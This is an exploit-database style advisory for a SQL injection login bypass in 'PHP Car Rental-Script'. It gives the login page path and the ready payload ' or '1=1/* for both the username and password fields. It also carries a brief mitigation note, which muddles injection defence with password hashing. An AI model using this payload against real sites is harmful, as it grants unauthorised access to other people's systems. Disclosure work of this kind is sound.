header-logo
Suggest Exploit
vendor:
PHP Car Rental-Script
by:
Hamza 'MizoZ' N.
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHP Car Rental-Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

PHP Car Rental-Script (Auth Bypass) SQL Injection

A vulnerability in the PHP Car Rental-Script allows an attacker to bypass authentication by entering ' or '1=1/* as the username and password. This allows the attacker to gain access to the application without valid credentials.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, authentication should be done using a secure method such as hashing.
Source

Exploit-DB raw data:

/*

Name : PHP Car Rental-Script (Auth Bypass) SQL Injection
WebSite : http://www.carrentalphpscript.com/

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com

Greetz : Zuka , Achille Dark3r , int_0x80 , geeksec.com<http://geeksec.com> ...

*/

- Log-On page :

http://server/[PATH]/index.php?plugin_id=4

username = ' or '1=1/*
password = ' or '1=1/*